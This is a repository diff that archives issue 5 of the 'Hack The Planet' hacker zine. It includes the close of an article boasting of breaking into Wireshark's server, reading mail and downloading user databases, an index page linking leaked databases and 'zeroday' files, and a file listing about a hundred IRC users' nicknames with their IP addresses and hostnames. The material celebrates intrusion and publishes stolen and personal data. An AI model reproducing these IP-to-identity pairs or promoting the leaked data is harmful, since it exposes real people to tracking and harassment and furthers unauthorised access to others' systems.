+QuakeNet, Pidgin, and Debian repositories. However, we            
+were more interested in having fun, so instead we dropped         
+into Wireshark's server.                                          
+                                                                  
+After 24 hours, Wireshark's server 'splash' returned a shell.     
+It featured a 3.7 kernel and an Apache httpd, which hosted        
+both the blog and the wiki. Permissions were read-world on        
+the config files, and we couldn't help ourselves. We then         
+proceeded to monitor Wireshark's www-data mail, as well as        
+download their user databases. All of the above is included       
+in the concluding segment of HTP5. Enjoy your corporate           
+security access.                                                  
+                                                                  
+                                                                  
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip  
+|- 1.3MB | 31MB compressed Wireshark data                         
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x07_Outro.txt

@@ -0,0 +1,51 @@
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+  ▄▄▄▄▄                                                                         
+  █   █  ▄  ▄  ▄▄▄▄▄  ▄▄▄▄  ▄▄▄▄                                            HTP5
+  █   █  █  █    █    █▄▄█  █  █                                                
+  █▄▄▄█  █▄▄█    █    █ ▀▄  █▄▄█                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                                                                                
+We've come a long way since we first showed up on the Scene. Current and past   
+crew of Hack The Planet, we appreciate your kickass effort that got us to this  
+point. Since our inception, we have unfortunately witnessed a few of our crew   
+members getting arrested. To them, we regret what has transpired, and wish you  
+all the best beyond HTP.                                                        
+                                                                                
+This zine, like all of the others, has been a blast to create. Those interested 
+can check out http://straylig.ht/ for past releases.                            
+                                                                                
+Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,   
+and DDoS Anonymous on sight.                                                    
+                                                                                
+Hack the Planet!                                                                
+                                                                                
+                                                                                
+Shout Outs To:                                                                  
+> ACiD (colored ANSI)                                                           
+                                                                                
+                                                                                
+                                                                                
+                   .                                                            
+                                          .                                     
+                          H      .                                              
+                    ░▓▓▓▓▓▓▓▓▓▓▓        .           P                           
+                    ▒▓█▀▀▀██████░      T       ░▓▓▓▓▓▓▓▓▓▓                      
+                    ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓  ▒▓█▀▀▀█████░                     
+                    ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░                     
+                    ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░                     
+                    ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░                     
+                    ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░                     
+                    ▒▓███▀▀▀████░▒▓███  ▀ ███░ ▒▓██ ▀ ████░                     
+                   |▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓                    
+                    ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░                   
+                   |▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░                   
+            \      |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░                   
+             \      ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░                   
+                ,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██  ▀ ██░                   
+              ,`    ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░                  
+        ▒░   /     ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒   ▒       ▒▒▓   
+  ▒▒   ▒▒░   ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒  ░▒   ▒▒▓   
+▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒  ░▒▒  ▒▒▒▓ ▒
+▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF

htp/HTP5/TOC.txt

@@ -0,0 +1,18 @@
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                                                       ▄▄▄▄▄▄▄▄▄                
+██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro       █       █                
+█████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU     ▀▀▀█  █▀▀                
+███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode         █  █                  
+█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap           █  █▄▄▄▄▄▄▄▄▄         
+███ ██ ▄▀ ▀▄ ██ █▓▓   ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri         ▀▀▀▀█       █         
+█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓   ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD           █  █▀█  █         
+█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark          █  █▄█  █         
+█▓█ ________________________________ █▓█ > Art                █       █▄▄▄▄▄▄   
+█▓█ HTP____________________MWTB_DLTR ███ > Zerodays           ▀▀▀▀▀▀▀█      █   
+██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro                     █  █▀▀▀▀   
+█▓▓██  █▀▀████████████████████▀▀█  ██▓▓█ > See reverse for           █  █▄▄▄▄   
+████  ████████████████████▓▓██████  ████ > HTP4                      █      █   
+                                                                     ▀▀▀▀▀▀▀▀   
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/index.html

@@ -0,0 +1,81 @@
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
+<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
+<link href="../../style.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<!--<h1>Hack The Planet</h1>-->
+
+<div name ="header">
+<pre>
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+
+
+      /████████    /████████    /██████████████████     /███████████████▄       
+     |▒████████    |████████   |▒██████████████████    |▒█████████████████      
+     |▒████████    |████████   |▒██████████████████    |▒██████▀▀▀▀▀▀█████      
+     |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█   |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/    |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▓▓▓▓▓▓█         |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▒▒▒▒▒▒█         |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█▒▒▒▒▒▒█         |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█░░░░░░█         |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀       
+     |▒█░░░░░░█▀▀▀▀▒█░░░░░░█        |▒█░░░░░░█         |▒█░░░░░█                
+     |▒█░░░░░░█   |▒█░░░░░░█        |▒█      █         |▒█░░░░░█                
+     |▒█      █   |▒█      █        |▒█▄▄▄▄▄▄█         |▒█     █                
+     |▒█▄▄▄▄▄▄█   |▒█▄▄▄▄▄▄█        |/▒▒▒▒▒▒▒/         |▒█▄▄▄▄▄█                
+     |/▒▒▒▒▒▒▒/   |/▒▒▒▒▒▒▒/                           |/▒▒▒▒▒▒/   ░ ░░▒  ZINE 5
+
+
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+
+                       IN COMMONLY USED PASSWORDS WE TRUST
+
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+</pre>
+</div>
+<ul>
+<li><a href="TOC.txt" class="zine">TOC</a></li>
+<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
+<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a> Files: <a href="../../files/educause.zip" class="zine">EDUCAUSE data</a></li>
+<li><a href="0x02_Linode.txt" class="zine">Linode</a> Files: <a href="../../files/registrardata.txt" class="zine">registrardata.txt</a>, Screenshots <a href="../../files/ss1.png" class="zine">one</a> and <a href="../../files/ss2.png" class="zine">two</a></li>
+<li><a href="0x03_Nmap.txt" class="zine">Nmap</a> Files: <a href="../..//files/nmap_dmca_lolg.txt" class="zine">Fyodor response</a> and <a href="../../files/krashed_and_fyodor.png" class="zine">Fyodor's last resort</a></li>
+<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a> Files: <a href="../../files/dbs.tgz" class="zine">dbs.tgz</a></li>
+<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a> Files: <a href="../../files/NVD.zip" class="zine">NVD.zip</a></li>
+<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a> Files: <a href="../../files/wireshark.zip" class="zine">wireshark.zip</a></li>
+<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
+<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
+<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
+<li><a href="HTP5.txt" class="zine"> HTP5 - Full text version</a></li>
+</ul>
+<br><br><br><br>
+<!--<img src="blinking_cursor.gif">-->
+<div name ="footer">
+<pre>
+                   .
+                                          .
+                          H      .
+                    ░▓▓▓▓▓▓▓▓▓▓▓        .           P
+                    ▒▓█▀▀▀██████░      T       ░▓▓▓▓▓▓▓▓▓▓                      
+                    ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓  ▒▓█▀▀▀█████░                     
+                    ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░                     
+                    ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░                     
+                    ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░                     
+                    ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░                     
+                    ▒▓███▀▀▀████░▒▓███  ▀ ███░ ▒▓██ ▀ ████░                     
+                    ▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓                    
+                    ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░                   
+                    ▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░                   
+                    ▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░                   
+                    ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░                   
+                    ▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██  ▀ ██░                   
+                    ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░                  
+        ▒░         ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒   ▒       ▒▒▓   
+  ▒▒   ▒▒░   ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒  ░▒   ▒▒▓   
+▓▒▒▒▒  ▒▒░   ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒  ░▒▒  ▒▒▒▓ ▒
+▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
+</pre>
+</div>
+</body>
+</html>

htp/HTP5/index.html.old

@@ -0,0 +1,80 @@
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
+<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
+<link href="../../style.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<!--<h1>Hack The Planet</h1>-->
+
+<div name ="header">
+<pre>
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+
+
+      /████████    /████████    /██████████████████     /███████████████▄       
+     |▒████████    |████████   |▒██████████████████    |▒█████████████████      
+     |▒████████    |████████   |▒██████████████████    |▒██████▀▀▀▀▀▀█████      
+     |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█   |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/    |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▓▓▓▓▓▓█         |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▒▒▒▒▒▒█         |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█▒▒▒▒▒▒█         |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█░░░░░░█         |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀       
+     |▒█░░░░░░█▀▀▀▀▒█░░░░░░█        |▒█░░░░░░█         |▒█░░░░░█                
+     |▒█░░░░░░█   |▒█░░░░░░█        |▒█      █         |▒█░░░░░█                
+     |▒█      █   |▒█      █        |▒█▄▄▄▄▄▄█         |▒█     █                
+     |▒█▄▄▄▄▄▄█   |▒█▄▄▄▄▄▄█        |/▒▒▒▒▒▒▒/         |▒█▄▄▄▄▄█                
+     |/▒▒▒▒▒▒▒/   |/▒▒▒▒▒▒▒/                           |/▒▒▒▒▒▒/   ░ ░░▒  ZINE 5
+
+
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+
+                       IN COMMONLY USED PASSWORDS WE TRUST
+
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+</pre>
+</div>
+<ul>
+<li><a href="TOC.txt" class="zine">TOC</a></li>
+<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
+<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a></li>
+<li><a href="0x02_Linode.txt" class="zine">Linode</a></li>
+<li><a href="0x03_Nmap.txt" class="zine">Nmap</a></li>
+<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a></li>
+<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a></li>
+<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a></li>
+<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
+<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
+<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
+</ul>
+<br><br><br><br>
+<!--<img src="blinking_cursor.gif">-->
+<div name ="footer">
+<pre>
+                   .
+                                          .
+                          H      .
+                    ░▓▓▓▓▓▓▓▓▓▓▓        .           P
+                    ▒▓█▀▀▀██████░      T       ░▓▓▓▓▓▓▓▓▓▓                      
+                    ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓  ▒▓█▀▀▀█████░                     
+                    ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░                     
+                    ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░                     
+                    ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░                     
+                    ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░                     
+                    ▒▓███▀▀▀████░▒▓███  ▀ ███░ ▒▓██ ▀ ████░                     
+                    ▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓                    
+                    ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░                   
+                    ▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░                   
+                    ▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░                   
+                    ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░                   
+                    ▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██  ▀ ██░                   
+                    ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░                  
+        ▒░         ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒   ▒       ▒▒▓   
+  ▒▒   ▒▒░   ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒  ░▒   ▒▒▓   
+▓▒▒▒▒  ▒▒░   ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒  ░▒▒  ▒▒▒▓ ▒
+▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
+</pre>
+</div>
+</body>
+</html>

htp/README.md

@@ -0,0 +1,2 @@
+# htp 
+Hack The Planet

htp/anonopsipleak2.txt

@@ -0,0 +1,106 @@
+ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
+ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
+ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
+AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
+Anon23845 95.140.125.37 free-125-37.mediaworksit.net
+AnonFin 194.110.178.3 mail2.paf.fi
+AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
+Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
+B2F 173.84.223.70
+Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
+C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
+CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
+Caleb 94.75.255.118 hosted-by.leaseweb.com
+DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
+DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
+Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
+Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
+GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
+HIv 95.140.125.37 free-125-37.mediaworksit.net
+Haze 12.18.245.219
+Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
+Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
+Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
+Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
+LOLOL 0.0.7.209
+LTD 174.127.99.174 174.127.99.174.static.midphase.com
+Lumina 186.188.228.113
+M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
+Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
+Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
+RetSnom 138.199.70.143
+Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
+ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
+Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
+Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
+Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
+Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
+UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
+Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
+anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
+anon4347 75.149.43.213 fabgraphics.com
+anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
+bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
+boho 173.23.64.22 173-23-64-22.client.mchsi.com
+br4incr4sh 81.56.209.237 server.abcdeflorent.com
+chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
+cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
+cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
+comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
+digger 0.0.0.2
+don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
+dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+e 209.212.149.109 za.l.to
+eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
+elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
+facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
+gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
+gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
+gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
+ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
+hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
+heckl 68.68.108.159
+imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
+k1tt3n 213.251.194.76
+k3ymaster 173.245.64.95
+koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
+lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
+locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
+loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
+madmaster 77.247.181.162 chomsky.torservers.net
+manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
+mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
+naSignal 193.138.216.101 tor-proxy.vm.31173.se
+nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
+nononn 46.239.119.58 host095577.olf.sgsnet.se
+nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
+opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
+pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
+ph33r 68.170.73.247 247.73.170.68.belairinternet.com
+phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
+qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+risk 202.59.80.158
+savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
+sd 0.0.7.209
+sdk 201.82.181.124 c952b57c.virtua.com.br
+sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
+soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
+sprinkles 213.46.138.76 d138076.upc-d.chello.nl
+subz3r0e 41.202.225.156
+triPPy 173.245.64.183 173.245.64.160
+tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
+u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
+uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
+veritas 0.0.7.209
+workbench 50.71.143.81
+wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
+xent 77.247.181.162 chomsky.torservers.net
+zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
+zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
+zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
+zxcvsd 95.140.125.37 free-125-37.mediaworksit.net

htp/fake_ghostshell.txt

